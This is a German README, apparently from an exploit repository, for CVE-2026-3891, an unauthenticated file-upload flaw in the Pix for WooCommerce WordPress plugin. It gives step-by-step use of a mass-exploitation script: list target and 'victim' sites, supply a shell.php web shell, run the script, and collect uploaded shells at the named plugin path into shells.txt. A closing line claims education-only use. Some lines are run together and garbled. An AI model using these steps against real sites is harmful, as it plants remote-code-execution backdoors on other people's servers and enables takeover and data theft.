
Pix for WooCommerce <= 1.5.0 - Nicht authentifiziertes Hochladen beliebiger Dateien
Pix for WooCommerce <= 1.5.0 – Nicht authentifizierter beliebiger Datei-Upload
Das Pix for WooCommerce-Plugin für WordPress ist anfällig für nicht authentifizierten beliebigen Datei-Upload aufgrund von:
in der Funktion lkn_pix_for_woocommerce_c6_save_settings in allen Versionen bis einschließlich 1.5.0.
Dies ermöglicht entfernten, nicht authentifizierten Angreifern, beliebige Dateien hochzuladen, was zu Remote Code Execution (RCE) führt.
CVE-2026-38919.8 (Kritisch)CVE-2026-3891.py@Kxploitpip install requests rich
Erstelle eine Datei:
list.txt
Beispiel:
http://example.com
https://target.com
victim-site.com
Wenn das Protokoll fehlt → fügt das Skript automatisch
http://hinzu
Lege deine Shell-Datei in dasselbe Verzeichnis:
shell.php
python3 CVE-2026-3891.py
Das Skript fragt nach:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
Dieses Projekt wird nur für Bildungs- und autorisierte Sicherheitstests bereitgestellt.
Nxploited